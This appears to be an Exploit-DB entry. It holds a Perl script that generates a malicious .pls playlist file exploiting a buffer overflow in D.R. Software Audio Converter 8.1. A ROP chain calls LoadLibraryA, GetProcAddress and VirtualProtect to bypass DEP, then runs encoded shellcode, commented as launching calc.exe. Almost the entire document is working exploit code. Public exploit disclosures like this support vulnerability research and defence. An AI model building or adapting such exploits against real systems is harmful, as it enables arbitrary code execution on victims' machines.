D.R. Software Audio Converter 8.1 - DEP Bypass

EDB-ID:

17665

CVE:

N/A




Platform:

Windows

Date:

2011-08-13


#!/usr/bin/perl
#
#[+]Exploit Title: D.R. Software Audio Converter 8.1 DEP Bypass Exploit
#[+]Date: 13\08\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
#[+]Found By: Sud0 from Corelan Team(http://www.exploit-db.com/exploits/13760/) or also created KedAns-Dz(http://1337day.com/exploits/16248)
#[+]Version: 8.1
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#


print q{

		Created By C4SS!0 G0M3S
		E-mail louredo_@hotmail.com
		Site net-fuzzer.blogspot.com
};
print "\n\t\t[+]Creating Exploit File...\n";
sleep(2);
#####################################ROP FOR LoadLibraryA##############################
my $rop = pack('V',0x00430076);  # POP ECX # RETN 
$rop .= pack('V',0x0044B274); # Endereco de LoadLibraryA
$rop .= pack('V',0x1003d56e); # POP ESI # RETN
$rop .= pack('V',0x10055FBD); # MOV EAX,DWORD PTR DS:[ECX] # JMP EAX // And JMP to LoadLibraryA
$rop .= pack('V',0x10068022); # POP EBP # RETN 
$rop .= pack('V',0x1003AA1A); # ADD ESP,28 # RETN 04
$rop .= pack('V',0x0040aaf2); # POP EDI # RETN 
$rop .= pack('V',0x1002ef15); #RETN
$rop .= pack('V',0x1002ef14); # PUSHAD # RETN
$rop .= "kernel32.dll\x00";
$rop .= "A" x 11;
#####################################ROP END HERE#######################################

#####################################ROP FOR GetProcAddress#############################
$rop .= pack('V',0x1002ef15) x 3; #RETN
$rop .= pack('V',0x00430076);  # POP ECX # RETN
$rop .= pack('V',0x0044B1E8);  # Endereco de GetProcAddress
$rop .= pack('V',0x0040aaf2);  # POP EDI # RETN 
$rop .= pack('V',0x10055FBD);  # MOV EAX,DWORD PTR DS:[ECX] # JMP EAX // And JMP to GetProcAddress
$rop .= pack('V',0x1006809f);  # POP ESI # RETN 
$rop .= pack('V',0x1003AA1A);  # ADD ESP,28 # RETN 04
$rop .= pack('V',0x00447b7d);  # XCHG EAX,EBP # RETN 
$rop .= pack('V',0x1002ef14);  # PUSHAD # RETN
$rop .= "VirtualProtect\x00";
$rop .= "D" x 9; # Junk
#####################################ROP END HERE#######################################

################################ROP FOR VirtualProtect##################################
$rop .= pack('V',0x1002ef15) x 4; #RETN
$rop .= pack('V',0x10037d05);  # XCHG EAX,ESI # RETN 
$rop .= pack('V',0x100753c0);  # PUSH ESP # POP EBP # POP EBX # ADD ESP,10 # RETN
$rop .= "A" x 20; # Junk
$rop .= pack('V',0x10015a15);  # XCHG EAX,EBP # RETN 
$rop .= pack('V',0x1004108e) x 20;  # ADD EAX,0A # RETN 
$rop .= pack('V',0x1007275D);  # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10
$rop .= "A" x 4;
$rop .= pack('V',0x1002ef15) x 5; #RETN
$rop .= pack('V',0x10037d05); # XCHG EAX,ESI # RETN 
$rop .= pack('V',0x10068022);  # POP EBP # RETN 
$rop .= pack('V',0x0040A8F4);  # CALL ESP // Endereço de retorno da funçao
$rop .= pack('V',0x100080ea);  # POP EBX # RETN 
$rop .= pack('V',0x00001000);  # Valor de dwSize
$rop .= pack('V',0x10082cde);  # POP EDX # RETN
$rop .= pack('V',0x00000040);  # Valor de flNewProtect
$rop .= pack('V',0x1007076e);  # POP EDI # RETN 
$rop .= pack('V',0x1002ef15);  # RETN
$rop .= pack('V',0x1002ef14);  # PUSHAD # RETN
$rop .= "\x90" x 25; # Some nops
$rop .= "\xeb\x10"; # Little jmp to fix shellcode. :)
$rop .= "\x90" x 20; # More nops
####################################ROP END HERE#####################################

my $shellcode = 
"\xb8\x4b\xaf\x2d\x0e\xda\xde\xd9\x74\x24\xf4\x5b\x29\xc9" .
"\xb1\x32\x83\xeb\xfc\x31\x43\x0e\x03\x08\xa1\xcf\xfb\x72" .
"\x55\x86\x04\x8a\xa6\xf9\x8d\x6f\x97\x2b\xe9\xe4\x8a\xfb" .
"\x79\xa8\x26\x77\x2f\x58\xbc\xf5\xf8\x6f\x75\xb3\xde\x5e" .
"\x86\x75\xdf\x0c\x44\x17\xa3\x4e\x99\xf7\x9a\x81\xec\xf6" .
"\xdb\xff\x1f\xaa\xb4\x74\x8d\x5b\xb0\xc8\x0e\x5d\x16\x47" .
"\x2e\x25\x13\x97\xdb\x9f\x1a\xc7\x74\xab\x55\xff\xff\xf3" .
"\x45\xfe\x2c\xe0\xba\x49\x58\xd3\x49\x48\x88\x2d\xb1\x7b" . # Shellcode Winexec "Calc.exe"
"\xf4\xe2\x8c\xb4\xf9\xfb\xc9\x72\xe2\x89\x21\x81\x9f\x89" . # Bad chars "\x00\x20\x3d\x0a\x0d\xff"
"\xf1\xf8\x7b\x1f\xe4\x5a\x0f\x87\xcc\x5b\xdc\x5e\x86\x57" .
"\xa9\x15\xc0\x7b\x2c\xf9\x7a\x87\xa5\xfc\xac\x0e\xfd\xda" .
"\x68\x4b\xa5\x43\x28\x31\x08\x7b\x2a\x9d\xf5\xd9\x20\x0f" .
"\xe1\x58\x6b\x45\xf4\xe9\x11\x20\xf6\xf1\x19\x02\x9f\xc0" .
"\x92\xcd\xd8\xdc\x70\xaa\x17\x97\xd9\x9a\xbf\x7e\x88\x9f" .
"\xdd\x80\x66\xe3\xdb\x02\x83\x9b\x1f\x1a\xe6\x9e\x64\x9c" .
"\x1a\xd2\xf5\x49\x1d\x41\xf5\x5b\x7e\x04\x65\x07\x81";

my $buf = "A" x 180;
$buf .= pack('V',0x1001bc95); # ADD ESP,1010 # RETN 04
$buf .= "A" x 4112;
$buf .= pack('V',0x10071916) x 2; # RETN
$buf .= pack('V',0x10071910); # ADD ESP,100 # RETN
$buf .= "C" x (4436-length($buf));
$buf .= pack('V',0x10029cfd);  # ADD ESP,814 # RETN 
$buf .= "A" x 124;
$buf .= $rop;
$buf .= $shellcode;
$buf .= "D" x (30000-length($buf));

open(f,">Exploit.pls") or die "[*]Error: $!\n";
print f $buf;
close f;
print "\t\t[+]File Exploit.pls Created successfully.\n";
sleep(1);